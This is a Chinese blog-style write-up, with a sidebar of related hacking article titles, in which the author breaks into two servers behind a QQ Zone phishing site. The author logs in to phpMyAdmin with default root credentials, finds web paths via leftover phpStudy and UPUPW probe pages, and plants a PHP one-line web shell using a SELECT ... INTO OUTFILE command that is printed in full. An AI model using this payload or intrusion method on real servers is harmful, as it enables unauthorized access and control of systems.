首页
学习
活动
专区
圈层
工具
发布
37 篇文章
1
7块钱的BadUSB,怎么玩
2
插一个U盘黑一台电脑-Badusb最详细制作教程
3
十块钱RMB | 用Digispark制作一个简单的Badusb
5
打造属于自己的渗透神器 第二篇
6
社工模拟——利用BadUSB穿透3层内网
7
穿透内网防线,USB自动渗透手法总结
8
【内网渗透】神器Mimikatz的入门简单实践
9
实战渗透 | 情侣空间钓鱼邀请,撸它
10
渗透实战之QQ空间钓鱼网站
11
【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]
12
QQFishing QQ钓鱼站点搭建
13
看我如何定位骗子,找出幕后诈骗的黑手(上)
14
我用Python渗透了一个钓鱼网站的所有信息
15
简单的制作一个钓鱼网页游戏_简单网页制作代码
16
攻破黑市之拿下吃鸡DNF等游戏钓鱼站群
17
CobaltStrike专题 | CobaltStrike实现批量发送钓鱼邮件
18
关于钓鱼网站的原理以及防范方法
19
社会工程学之基础概念、IP获取、IP物理定位、文件属性社会工程学之基础概念、IP获取、IP物理定位、文件属性
20
关于ReelPhish神器的使用
21
七、Selenium与phantomJS----------动态页面模拟点击、网站模拟登录 每天一个小实例1(动态页面模拟点击,并爬取你想搜索的职位信息) 每天一个小实例2(模拟网站登录)我用的是
22
社会工程学 | cobalstrike批量发送钓鱼邮件方法
23
我用Python采集了所有微信好友的头像,发现了一个秘密
24
插入U盘自动攻击:BadUSB原理与实现(含视频)
25
珍惜数据,远离钓鱼
26
钓鱼网站相关数据
27
记一次识别钓鱼网站,所有的盗号都是不经意间
28
如何利用手机木马远程控制
29
如何使用Kali生成木马入侵安卓手机
30
黑客入侵你手机的方法不止两种哦
31
一个黑客的自白书
33
Kali之安卓木马
34
Kali利用Android木马渗透手机(高级篇)
35
记一次无线渗透
36
记一次渗透测试实战
37
你安全吗?丨点击“不明链接”后果是什么你知道吗?
清单首页技术文章详情

渗透实战之QQ空间钓鱼网站

0x00 前言

打开邮箱,发现垃圾箱里躺着一封垃圾邮件

一看就是钓鱼邮件,话不多说,搞他。

没什么技术含量,看看就好。

0x01 渗透过程

第一部分

直接打开链接

除了登陆可以点击,其他超链接都是假的,也太不敬业了。

然后发现地址栏域名和垃圾邮箱里面的给的链接的域名不一样, 是跳转过去的,遂访问初始的域名。

打开一看,phpStudy 探针 2014 页面。

phpstudy 探针 可以测试 数据库连接,试试看弱口令,phpstudy数据库默认账号密码root 测试成功。

然后尝试登陆phpmyadmin

直接访问url+/phpMyAdmin/,使用测试成功的弱口令登陆。

数据库里面没什么东西,因为在探针页面知道了物理路径,所有直接写一句话木马,连接之。

select '<?php @eval($_POST[pass]);?>' into outfile 'D:/phpstudy/WWW/test.php';

这个服务器里面啥都没有,只有几个用来跳转连接的php文件, 就回到开头,继续搞qq钓鱼网站的。

第二部分

QQ钓鱼站的后台,找了一圈没找到。

访问一个不存在的文件,提示页面如下图 发现是用UPUPW搭建的,猜测会不会也有phpmyadmin

尝试访问url+/phpMyAdmin/ ,返回 404

又尝试访问url+/pmd/,成了

尝试弱口令成功登陆

准备写入一句话木马,不知道物理路径。 使用语句

select @@basedir

然后尝试在upupw默认网站路径下写入木马 提示:(Errcode: 2 "No such file or directory") 写入失败,文件夹不存在

然后又尝试了其他路径名,均以失败告终 一筹莫展之际, 想到upupw会不会也有探针页面,会不会没删? 百度之,upupw默认的探针页面是u.php, 尝试访问

得到网站物理路径,然后又是愉快的上蚁剑马连接了。

代码语言:javascript
代码运行次数:0
复制
作者:dylan作者博客:dylan‘s blog
本文由公众号HACK学习排版编辑整理
下一篇
举报
领券